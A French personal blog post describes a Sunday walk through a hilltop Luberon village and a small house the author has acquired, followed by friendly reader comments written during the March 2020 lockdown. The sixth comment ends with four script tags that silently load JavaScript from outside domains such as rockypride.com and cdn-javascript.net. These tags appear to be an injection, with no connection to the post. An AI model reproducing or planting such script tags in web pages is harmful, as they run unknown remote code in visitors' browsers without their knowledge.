• IL ETAIT UNE FOIS.....

     

     

     

    IL  ETAIT   UNE   FOIS.....

     

     

     IL ETAIT UNE FOIS…..

     

    IL  ETAIT   UNE   FOIS.....

     

    c’était un  dimanche,

    IL  ETAIT   UNE   FOIS.....

     

     nous partons visiter  un petit village,

    IL  ETAIT   UNE   FOIS.....

     

     

    haut, tres haut perché sur une colline du Luberon

    un village hospitalier qui a le sens du tourisme

    avec son Château

    IL  ETAIT   UNE   FOIS.....

     

    IL  ETAIT   UNE   FOIS.....

     

    son Eglise

    IL  ETAIT   UNE   FOIS.....

     

    ses jardins

    IL  ETAIT   UNE   FOIS.....

     

    ses fontaines et ruisseaux….

    IL  ETAIT   UNE   FOIS.....

     

     

    le charme de ses ruelles

    IL  ETAIT   UNE   FOIS.....

     

    A mi chemin on fait une grimpette jusqu’à la placette

    IL  ETAIT   UNE   FOIS.....

     

    qui s’accroche a flanc de piton 

    on redescend par ses ruelles  caladees

    IL  ETAIT   UNE   FOIS.....

     

    et la vue sur ses toits en cascade

     

    IL  ETAIT   UNE   FOIS.....

     

     

    écrasé par la masse du Ventoux

    Une maisonnette s’y etait blottie,

    IL  ETAIT   UNE   FOIS.....

     

    attendant tous les jours notre rencontre

    Les pierres et leur passé

    IL  ETAIT   UNE   FOIS.....

     

     

    se racontent avec plus d’emotion qu’un livre,

    Cette maisonnette n’avait rien pour attirer le regard

    avec son jardin à l’abandon

     

    IL  ETAIT   UNE   FOIS.....

     


    Mais,  nous sommes en  Provence

    « Maison plein soleil »

    « Lumiere de tous les eclats,»

    « Soleil de tous les instants  »

     

    (apres la mise en main ,tout est a reprendre)

    et mettre en état

    Mais,on va se fait aider ! ! !

     

    IL  ETAIT   UNE   FOIS.....

     

     

    IL  ETAIT   UNE   FOIS.....



     

    IL  ETAIT   UNE   FOIS.....


  • Commentaires

    1
    Dimanche 22 Mars 2020 à 17:47

    bonsoir vaianae 

    cela fait du bien tes ballades 

    mais là plus possible tu as eu raison d 'en profiter 

    je repars au boulot dur dur 

    mais sa va je prend les précautions et aussi vitamines lol 

    poutou du soir

    2
    Dimanche 22 Mars 2020 à 18:08

    Je m'y vois bien moi dans cette maisonnette!

    Plein de charme cet endroit, il doit faire bon vivre là!

    Je suis de retour sur les blogs après une longue absence. Cette fois, confinement

    oblige j'ai du temps.

    Bonne fin de dimanche et merci pour la visite dans ce coin magnifique

    Joëlle

    3
    Dimanche 22 Mars 2020 à 19:02

    Merci pour tes belles images ma petite vaiana! pour ce qui est du vélo d'appartement je n'ai pas encore réussi à en faire! je suis très fatiguée et déprimée! ça ne va pas, j'ai même pris un calmant dans l'aprèm, il commence à faire effet, je suis somnolente! merci pour tes belles photos de provence! vous y avez dormi dans la petite maison? bises

    4
    Lundi 23 Mars 2020 à 04:09

    Bonjour ma douce amie

    Merci pour ces belles photos de ce ravissant endroit tout en pierres, moi l'amoureuse des pierres je trouve splendide ce village haut perché.

    J'espère que tu vas mieux mon amie et que ton oreille te fait moins souffrir.

    Je te remercie pour ta fidélité à mon blog.

    J'espère de tout coeur que tu vas bien ainsi que ta famille, ce coronavirus nous pourrit la vie.

    En gardant l'espoir dans la vie tout peut se réaliser.

    Si on perd l'espoir, on est sans défense devant la vie.

    Tant qu'il y a de la vie, il y a de l'espoir.

    Il faut respecter les consignes et garder l'espoir de retrouver notre liberté bientôt. 

    Courage et beau lundi ensoleillé.

    Gros bisous virtuels donc sans danger de mon ti rocher atteint par le coronavirus où la chaleur et le soleil sont présents.

    5
    Lundi 23 Mars 2020 à 08:07

    Un charmant village dont on aimerait parcourir les petites ruelles, découvrir ses murs en pierres sèches et aller rêver auprès de cette petite maison.

    J'espère que ton otite se passe et que tu ne souffres plus

    Amicalement

    Claude

    6
    Lundi 23 Mars 2020 à 08:11

    Bonjour vaianae,

    Merci pour cette belle balade en Provence. Je vois dans les coms que tu as

    une otite , j'espère que ça va mieux ! Je te souhaite une belle journée. Toujours à faire avec l'intérieur et l'extérieur ; Gros bisous-violette

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1584947347340" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    7
    Lundi 23 Mars 2020 à 13:56

    toujours de belles balades chez toi, ça fait plaisir! gros bisous Vaiana. cathy

    8
    Lundi 23 Mars 2020 à 17:14

    Bonjour vaiana, merci pour ton com sur ma page! figure toi que j'ai été jardiner, j'ai été sarcler une rangée de fèves! que la terre était dure! mon Dieu je n'ai pas cru finir! j'ai pris des poireaux, je vais faire un gratin de poireaux! bises

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :